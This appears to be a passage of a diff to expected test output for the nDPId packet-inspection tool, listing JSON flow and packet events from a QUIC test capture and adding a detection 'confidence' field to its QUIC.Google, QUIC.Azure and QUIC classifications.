Jk6aARYP\/VFYz2zQVzhOYWEpCg54BznwVNZxFF0LMNmGI2PVN06DbNXX9IxLaS+ptZnDWUEZKgww7Rh55OBQLkyONb3AXu68OQa9KfW6wKnH\/vmE8HYT6n+SXcK7GycIHau5AFjik2iCmv0VvdznzcaYCCq0Mfet4dNtH\/YoT\/I\/YrfjkCWn9TD2GpQpUNvMSERx6JmQCcnn6FUkuIqIOwQZ7TJ4fAgdop2a8RuxfgczRZ1qfymdRGBK2o+W0zafNFhHNk2SYmyvsZ1V8VBf\/oEixGqVnlZ\/Jq+d3sW39fHCM7TJKwcTtcBclxaa8fGLAAlW9lwT0AQAwjaArlz\/6Lw8tnHTm015jYFYAA5vZt1SyvuCzOL1voALV\/+nsbl3\/ONSPNJsDGJadYCDcjqbyAwc3rD2eTlnRMOCdPOfDkt6aPuNtwIQdnKz2fd4z8axtKYuzjc5dW0Vg4zcREoGQwXF3Mlfi7nUkcrBa7blnobGRnU3R82Mb1vEB9HojGcsN+QDpwTPjHZhspz1V5NyHgQ7hab2FBtan1NhmTF8w7rDqqAwRtjT1cqxDw9C9TkgJvOeDw\/J5ejOyPpxUe1E98wc8RMhxL8HbUxhU6"}
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621501260783,"flow_last_seen":1621501261082,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501261082,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}}
+00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621501260783,"flow_last_seen":1621501261082,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501261082,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}}
 00629{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1621501261282,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621501261282,"pkt":"AAAAAAAAAAQA2OESCABFAAVibSVAAH4R2uk0uxSvypibefAsAbsFTt60w\/8AAB0IZEtuMTNmxFAAAEU0LH9lIIuMdZ7Kq5MCzCZAEE+168Yufakbt9pK0ksbFQo5gOkiaZtZmGL7ajorb6dlvPftlMSSvVuPm3GtlmjJiRJfcfSv6WCOpmfO2v6Vi8Gqe2z+CCwK+2m\/JLswIRcEtxYUQTR+mGEhGLqGsRBSch\/o0S7SruCC1QzCSC8G53\/qUYvkz+bnlIyDwadCcS+Bc5KcjL4tNroERGF7KikT1T9sF4XsS6GZZ5vImGfO3EkmUp8XE7jlVo8hS1am9\/dWmCCc\/5UVFDsBeuTG7wkgrb8swjB0805Wj9GAKKohjHey69GAIKPU3++2Imdagnr4acCwOFCrohzIIheL6xgOuccLlkxDVLjv32FfUde9yJXpLDBHMt76\/rduX6hlX68l11YNKGEr\/zkJxTj9ypa0blphHmap9\/VBxt4j+qGvE8cstJqh+0IpvOAVwU9lYmLuMLrq1nyWotlAq9mRnhXu+BQIbhgiYOfa+NaU9CqMuW+zTjv\/orQq5ERGPyXLWWaqpnLvACGfb9O5GE65tq9zbrPCgxRqZkEBql7CjsnZhZlmCr3gHvgCBq68gfxQu+39WkMzkvkbP8IALmggIQ7VQf8BFdayRba+Un3cP7f07rfoszy+m8D\/z0DW0SQgPeYsF\/KmQko4DJ59g8KzGl0re9gjZRv5RqIECyhlYHWJ7GyL1p6bli3WeNOhxQJ2LLSs7R5C1m3Adc0j0XFC1pB+sAW\/WEd5oLl9Hwjd6M0MklHMK0LYJJtSeHujnXWGQ8zBsv7diOFCmysv3C+aiX6B0P9ogHiAroIepHRii2maNhtRux1yyqTbuXMBGnRPqFAWbVaJQnNR1GwNd+qPfEmyFuIfG3xnj0aeWVINv8LvYzmYdOSTc7SL9gqYuvzHxRf1+Upzh4eF5QSLoWFnXPXL3449L3q0i+u80g9dZ3zpdrqQOpENcencZZGYbAgeK541RYNNro8eF8HwnYPBOIy\/Zl55vIK\/DEhSHnDpLGsakuI5sKTjtOeDx8DcJWgQ1BpawPb8oHOX7RqPhuxoKHRxFskxCDjHJh3ZT2U7YKpwgythqKBDauWw6V0hLNf6LNYtE9ypEHgKJ6trOXxgEDjS1iVFjdsX8YQ6+uIw\/VczFtSfg\/SPICVvTLXIAkfbMpSXSpbuwtaktICU2t9lJxcQPW3\/l2RVQlQ6A9orYmKqPcVckVDM+iHEIyMf9H4+vCZVgRIIICMwjlkLV5tcwaX0n7fRUHrmKaF8bEP9rGW60wBvfzerDhS2zUGBYaNPcvoOZQT2ZC\/EK4cXTZIBKvBIyWC72OiMtkS12h5aaPAtwZ6n2dXPCOk3d5CPWaaLjKOIMoQxRhJPD+tcF5lq+ivLDIhTHUNk3nCiT2ptn8sF5bPoqGsz0vo61bRIdmWMMojjGxrRSN7\/n7VJ7xjrskWBNwwKUBcjdFlM0H0heCJNg1grIB9Hn\/3GIWzCFZQ4MK0h3E8LnbseAq9C+ciIX45aTl8kFGqoSHjTiIRX1LhP\/Ej8fNDVJL8xCvYIK5uvMb5wfu4aPiMKEV+qyT2Ru5KgH3hlAbiLVCIDHX3NwF+qehB6sfUut4lougpqanWJ25xwUyKgjA21oplysL84+Pde6u0fQ1tsE4nXneYYoZdfcbHNS2+TcLpNnevmrlv8oGUF+IHSvQ2pys4po2Ft+zwvHiZVRUCkyaXat54kiLBaAYSl8PWx5iWyAEXxmiBRpM1GFaKzxBpGVsS6lfPmZGj\/E0GSH9ahQaWLKvJL1xv+z\/y5zk8w"}
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501261282,"flow_last_seen":1621501261282,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501261282,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1621501261581,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621501261581,"pkt":"AAAAAAAAAAQA2OESCABFAAVibS5AAH4R2uA0uxSvypibefAsAbsFTsIcwP8AAB0IZEtuMTNmxFAAAEU0JZ1KfLVI+JBmlx1gc1nZ06mlDQJxsWyoA2bzQbVVMhPumzwO3ZAR98o8ZPo9xLCUDTzGpsR1VmkqScVjzEZA\/RjIqIioWENrjUeZOvFpfzQMTLEtfK1H5gSkSzr1d9deTBzCPCECHyoWo01URci3jW51V0HbjDnEJD1I8iSzapavqXvkm7q\/CkPAOKz+EFk9ddN9tvBAUK+D6ra\/NoAZo9xXayAuRyx3iyJFB5EvlFUz1Sj7dTVlS5+TdfHDF6BCtxu\/3b6UGPME6BE0mv1zrD1kdQyNtPuDIptySY43Kas3SgvX\/I4v3DNRjU9o8CMW8YMBriuPdWaursmVudUTJYnB0q37mK+lxWkIltSWsQNuLr5cp6c4Vru0wwO0Ame+VygNGHbkKKCLw\/51hBpKkkTptkPAlMSaQQtKQI0OPuk7ItN4VrB+m9Vkwuz17+rymkBrFyMhsKcJIjj3luZReWaMMeNdN7r\/9xHAgrWKyyA3NzqfpYemGPDltByS1phr383eIdP8f5Ze0Ac0+tdcIJ2dWvbXqHhn3dZjhSk0HZZGEHnio7bqsyCfy\/wl3pykgp8G87hcfpY4upvLLmQRm6zklE2ZcD8mFhu4pD4VtgI4q1NkSPN4ENjVSltM1\/G\/SJCaisjk7\/TaytPYDocBazw8BpeLBGuMrWBrDpERso7obnHeO8wf+Lzqup7YnGDMt9vWazQbf5KRZY344vRrcxm8Cgm6xrf7EN0vEZrGdmbVtBvFwjU01hxeAVD8m7tC88nDxYD\/Vcms+kgEHQFUG5VPiMI1EaEjp4uM84vZhZhC6CDRHypPGw9HGqiPK3b\/Pd6yKRggtZr\/oWcBajQm0w+tBJKdOv7x6ZSHD5PhdRlgANNg\/jeNfdV0X5QnhkLi02ZeZq8yEDPFn9a3Lnz57TXoXYYfH6skWRGwGSQ2xHufw0DtBDB91pQTHPRFqigTQMOkcbUHvQ9FLSynEnElkdYIwyDeYl1wlkOI3z6haMDXB1V3RpZHuXa5GdOGVPCXKGY8TvCCd23w7RNdvgI0SAkP50qXRP4Kk2X1AVVlqpYf8FwiZi9W0HEiDmKaHfCa6sFt1\/rgrqUUw5ELhzKrL6pJ+lTg3H5NM0cd0C4hTHBtzSm3C5D7f92zskegG0WyFRw1Ba8N8vzkk3+Qhp\/je68IXQzCUe2u\/EtUX6CQYfCYIoWtYM8z5STiqZadSz8Hcj8gkMjUYbOqoFONvZacfYEHB0SARvuLReB4iTtWuIXgjYJcb5Qkm+SBb46jf\/04rZRrUrWfuW4MRTyzVXxCithuxVhs4F8PHfdPTq\/LCBBTHWDTyCQfTKVPq8P8t30ZnQWxsuPjLcSqLk2yTFwMtN32Tpl6KkT++kfElEUN8g20QBH4D3nsWOQyXh1qp6BLTCOt0IKBckhyNskXvMkS9f6xJSD6uYDR8gpfSiiduxVMENXsD+aZg0sKhc1tnhY564nzvmzaK5pK\/mG4HpcEZaoQlPnN9CVVFsxc\/AdJrQTcfRaJiP8\/\/Yg3DwS0RE3P4jvs8+29fssz2Vycvc4CcLnL6CYBjQV+ee549uL3GVp1M5HV3WkcafyAbynhL22G3n+0pOA92LLDWaPxdPw5GuPkVaJx0v0qoyE9b4AZ\/f7JyiBWPsZeIMB4ss18qfbar1+hhPvrhcG72WrRn1MOHBG\/UEQi0IsO4yKvwqiblXD9HjT\/0dhqt\/RFTAwug67Fa0M1R4Gf6vwbZT92OzvcYVJR3zAK+LRbdOlVy90zr3DQGbvb"}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1621501261682,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621501261682,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVOJAAH4RQ+GfdbB8z3k\/XPqGAbsFTv9fx\/8AAB0IqwzBH+7SJ6oAAEU0U9sthnA8M57fkNsMeJ2EE1SHED6gJhbQN4BfQJOO1PjffFq3gtFk4IyP8Wth3mraFF35AS\/mCSP5GPdO\/bY3uB7Y7VeiLUEY9IS2dFIrYZfbf9ZQsemW2z0+VCxvN2Db9C7578kBNAZHcZiUcQFU7QlwuGC4nwNjsiuK0SteLVHFM0d8O27xz2JpZUPDhtvrtHPERZTudFi1Sej11OjXXeMujoumIvT2OYdCj+X0NfUPlwu9sFCLpzinhlfbOthWMWB8q\/9N\/OyqjEr4qbDQGFnM\/Hr8eJUBkqVZluSAYj1Ywh29XdTMOcq5AUfmyV1X0sTrgeDtnbqi3godsTwx1QbwhKBj2dWTyYyHTDajH+2UBid1GebdhLGSjjnKxxAaaw6EFgQmpu7koEqoPObHp5kFU7wjAY8mggUyFBVjUIfNBYhWssGwyT5Z\/r5OGZuX1rx6tRJJm6gIeL60FE9LVHmgWUsYaHuVYpkqJgZrs8PzckQh0niaraVIhLPsP0c2zyZ8p6k39xAgrRwfx\/Zh9nPNn3qSfxXEzLRxlRYWUsplPXqYbIcReCdkDC\/N5gL1eP\/jiLz6QU52SRtg8taUEPRtc88DYo2jurpisQQ15KiRpuliwmtrhW0HqBvzdAZZarXSjJIjkWxLUUFMahlxZEceLNdSqe7MdK1UkaKw83287xEiaSEO7eTUM+\/wBRhGZf\/1DB70GE\/ULxXMbdJn9jltiavDAQNSyczf2+nbYlnG1N6O1TcuG42rxaHRd6KknCvWSCrAhQM\/VqLCDk0bY2mxWybhrjoGc0JuiCMFsYr+5pV5QRoX4Lq+e9gqBFnp3Uaem1xfnlWZMvZVrfurPDH1T3I4Dx8IroHaQ2Bo5DvKOdsiFkfzx2DBIq6SjpXaCsVzWBgmVAE9DRo2pY+eROHEOdfo8\/FBuCZXhbIlRq1heZJwhsmlY+7e2qNgtpC5DaW7zKw1HKVB0RPYT7VRcRTNl2g+fmbYvt3YQzNlorcN9OrbGF4EZ32C93f4\/HUQOVFV2yInR8hfRvuHsywq5N9zdnMDFx4UtoGC5\/JPOmqIglqIM9o0AUrBq4GdLXhfYvcFRKKHwZ7TRsYLwmoMgHWy8jwfHZhK1htPPyCu\/l8XN40QZGFptNt7D40U7OSwWUN1+psHOjRZWv6ST7CMmleHqyEPl1KLs2mifOpHcy+gSFbFBD6LLuLlmcGxRtETjrnZ7+bSuE+Zt8ruZaaGcSfNYzrqd1zOq56HYPd6nlE\/mmgkW8AFD4HgObgvdcHAI+BQl2HO3lTApnJPdlU4\/6LGlTjc\/Xy6ZatrCgtI9vY0+cPbiLZUSCI0nkM8mmbA2A5MknAZe\/w1hAi0GLW9UoOUSrCzacIaeo9N2SakmRlQF7OxrccNFQQ\/UxrBENXiSn8dd3pbynfOPUKA8bLUE0Fha7t882zmf3D2IV8UDrWHqT2rFiv6k3POzwJo9CVhSImVzpyIro243Q09zk2kOJxu0gB1BHDvYJrVOYEpZLmGM4H5HwzOJAsaUidoe7\/oRQyD8W5INMmeQBEWvyryJW11xgcq+r4ORSm2VIuTghtDpCYCC2hC9f+Dlxwu8h6CMW3kWH65itA1vwPXB6v+afYS01KWtxgI6eW\/NRjdMoX0SXGogIM7OSPQVVfkk4D2+dJAm44\/U0Vl4ZMoY08TeAfdXHgiERB0dXg4yr7L237fx9MyFJtNMScYo+op6Jjwo90fx4MlC9rlwatwxaF9nbgK0o\/x2ee6fFva6TLmGaGSkDA5"}
 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1621501262182,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621501262182,"pkt":"AAAAAAAAAAQA2OESCABFAAVibTZAAH4R2tg0uxSvypibefAsAbsFThjAy\/8AAB0IZEtuMTNmxFAAAEU0P4kZL2JzcQJCkWJO7BYAvn7jOS\/oPDLLELaAGZjPfdWe+CTrIzdiC9WRX3rH+cQNjCKbZa53WspbrWQ3y9Iddgk3mFf\/\/P8OYcu5S5eZdMR9fbh3X6m7e1P0w349oYB4hiM9IJyVYjIofcoBFkKxh\/5ebxmzh+XjVHAni37hnczZyCzMbpvTaS5Mo2\/ZngECyPdTH4R55wpjirrbqawWK5BXgasVyeycq3PgcjRIEDZMmdGuCfn6Or6mlQ5Oi0gPVZivFAfQTbBQpALI5TF4c0OEuWkV5PvIlcn\/R7+MoVcxfy0r0Gxfy5DTUZSVKcVUqd7yhkU9aooVQ64ePPS85n0Ao6nJaHk4CEcKYTxXKFGTV\/JRmN1fStNbk6PuLzUzSKy7W3AsorHxQi\/LmRhIln15AQZY9aFzjxmdp89pwdjIhQaDCc86JMYVdSIXjTQq8957N1jOVphrIDogsXbfM+ETcmeLbNKqN4fwVd+mT\/89Wjg3KjoISCw7cizx3pwneM1IZWZxw32ejl27XFc+DeXbCTyms0wwx5d4mug4d1+BMTCaWAoTeBSMDXB0j0tkDNHX2xtWAXf8\/UuzEfOvYCbb04iQFTA+2Hyu4GRbvJwOTWHAb6Y\/V0BD9+rx2H6RD7LGvrHh+f8uY0EPosNsFiCs+3i7J7uh6lA7HBXpprFebhJ4nBFU5ogCjUR6v4cQw9N50B8pFKaCLLkzxxoYWvp6aFiNZxcUELv9ZUwZSWCw5u9TxfZdk+lnaGdGEYWUKBNrO4TMaapbDNq4j7Vu95JXokG49C08JF5JMM4\/z45it8ndhYZEyZbzHD2yExEQ\/VN\/mKUwF8ibUn2C67S\/5tn76v1S1e7HnOhXa9tt7ko7BC5wl0mN\/vl7Boa7BeFOH9ChJqMRyakFr8qtdw7Yu8g3vIiwJEWJpLTwekZqiekCkjohBvin+U4rI8Z4iedGc5HpW5HGFoexz0CrVl5wTxzNhI8j0IRw+jVswS8qYTpoGTz3OrlpPStmJil9HnykMux+BL5xXOZ617kkr3QdqqRshG\/RQrR8s6QAYGI71oEFLMM4TOShFAvx7OQRDnnJcVkbGzqXs2GA+ynEHK77vOrqNEjJpn4aKnbZnLLPOZDQS24eO\/QA+vv4uiLfH2hoxa65Oz8gK+JnY4IVu3sZb9w57SJTYpFHSRkiWRXzCJ\/sWWaohJYMR8PWJxuCKDHkDpOYFa4Gqs5Z2wJN\/RR3okXqWJS7yxFbWwGA\/Ux6HYdQ3Ct6YGwLA0DbmZnkDdT8uknz2+RUM8H5unZqgX4DQ6X6XF3z+e9cZs+qvkrBFmI7iTg\/AWeOO4DzvapIASiBIUwtJXKqd88VrnmgGNuzFGO317nsPM\/31UoR27Yt3dsU0KGRIpm65J\/+Rpqv+FCFt3c\/28P38sc1iZpuj4G1ByY3uO9KITABAM93OOoXZVsw4nYNriGxowgXJm4ZpYPg6mQ2LTkJ1L1uH0ng6enuR+XlH1t3Mdwkm8\/\/s+srKemwScHPxez2jonymTIlyHWEj43rE3SOOstfJJIdIbioCt5eaO4rJ\/ZtzFVP3GREeo2yr+vwPjDBvXv+9IKyIRXu1pKvuEupgzLBzLb+08gepp2KupXz5AcDO7p5JSUs7lVhZLWrwC\/4LgHlJK00\/IeVej+hl6DABvNdRucAzmPdswdQTBDGuRv2XQeZ5xK3vAhBPzvMWU8ulKLrK4WenJ6YSemx045mCE+N3D0BzGu5PxpiypXC1Fu+3yqrqa1cp13uQg0a"}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1621501305362,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621501305362,"pkt":"AAAAAAAAAAQAtexhCABFAAViLHdAAH4R7mqfdbB8EM176sqQAbsFTpTBx\/8AAB0Ivw8tm2Ku7RQAAEU0Z52IbyPObDKu7BbGHFwXmr\/rz3QfyBRTJB3p2RnE9UysoDSL0A3iYi2pNKedwkl5mpvF\/Vk60tFlBZiFzkrxIN49ZjHA7MZQYh4BUIyAfPPuF03+ZMM0Su3qn9AiiUpsB+dNsu+962VPg19tLI\/VV6H3PHsG4PuMw4cn9i3LGYoZQn6aHv1YbAMYupJTDvNFcb2s6pFl8eB\/z0QA6+\/NcaLseMUOgNf8TfMmV5DJVFMWinQmIIE8GPttZVUixDh1PXr9\/XOfl5MsudOHGbS\/BoKDVUuxmXWMLXGEKU9H0vMlsYLhLUm0c3MDnKGeVSrkeYvPjroMfaat1Tiu2LmC1yjTT8Uvh3DZ3BJLLDzubsslmJNrUgLURH5a1TFkvH9Q96Xa\/CgdBXGH7ShdRTQlh7Spx9l0kHtYDDWtdmymj3cp0EdEjn\/au5ybI8UfXEQ40NFe\/bpqHpIm9OIaPawLRKnKVCmPwkTkJQmFtLRT8FIc+hxG8+42VlkD9SVwOketnoEDo67L6UjWGJq8Y0bKa6DKJrJHKlb1cBaN\/n0tnPhMblSJyBYOeYoXsn+gmj9b+VHHpisogUCwUgPQms6WZ1Tn+icYaQ+CSAy4kHR6jZ30M6ApyQmmHvzN14vvzh+CT59we\/MSd6bYyHCxqlNxNi9gnxXYBhI44N0AGk0Qqhje+CC0oYc8WWkUM1686AJps19dxQQb1m18EQJq7trGNUuhfyUdSuAwL\/l0h22i0uupo2DPl3o0+7Bt3qwlrzpKyCufm4ZmMAPpvK65nzp6cFH+pmlOQ7s2YRoxtUhnAtjgxag2R4\/nlewGsR9ygeGjxTA5LiirItmkj97AzgWwoIUP9ldEWuIUcvVhLe\/QB8zLa7AJgeB1R4vJAZowIkhS0+EMWrzuyLxX+IfaYE0iHLqkcbQA3BNqXFj4h621k+KIOiP4lvVResrE\/c+w\/Oj5tA1lx4837jiHi0YZT52YvwcFEmqMCZU8XqMRUIGXvjZqo9v4Gwo714AlFrATSjPNB0rwwMyUukaq\/3e3DvrcgQ9NGlBVWFxhz1tqnsLP7Kr\/srqsLf5Bw4wZJQF6sEZW4nlUnupPVa0tpr\/+wGxQCug6xHyGNDxwnWnyjCwM4oE2hnNUNVujvf72\/dvTfU08lPagglVjnYIuPVm74QZYTZRFryAhxJK17r+BPfOlYKd+vVYMtivnHXjiFQVByr8k1Rcm2cpPeLXL3f+bAsmGkc4EG6HjppgudyHK+UV5oHN+m4I6LZs94OtdQcI6RUnBhsNPqFTdenognWR3FDybsz6sXPvUHez6OFefzWFvFSrz6XT7otFR8cdYGpKRwwSfHP\/PrekwOkrlmZijlypd6KXVAl4pAFkRLTGqSWHEA1LRLEvTNukH3xy5z66DEUDlFW01SciuFipPqn91VwpPL0iC6UpfNOoxnK1nHPehbzvx3A9Po2F3NnKEzfedfgajLA5\/LmaIHRmUo6B\/KmNXMWBfwWwfMwOtQ+o42gw8mnZvG2Qqex771hctyXZMqH2SJLXmmk6AtETcwF8B6jbJ768elE90Bhjm6anLtIwTYQnbLc4EH5TtLu5+uZ3DUfoYbPMOgeH4lIEDjI0kYQ+7lnl1zdIWgKe+MmglR86en4u4M1jb\/5BPspqYSJQDFVzNKI+9EnvCEh1nm4ZLP5q4L5n4Y\/OfoQNHRw1mNsvzMmZ1LR0N0nXyXURG6oysqTj3iTmd8NZXAVgqVBMCFaGWht6XT+2k4r7buSS+jBPmF7S9tGqU"}
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621501260783,"flow_last_seen":1621501262883,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621501261282,"flow_last_seen":1621501263382,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
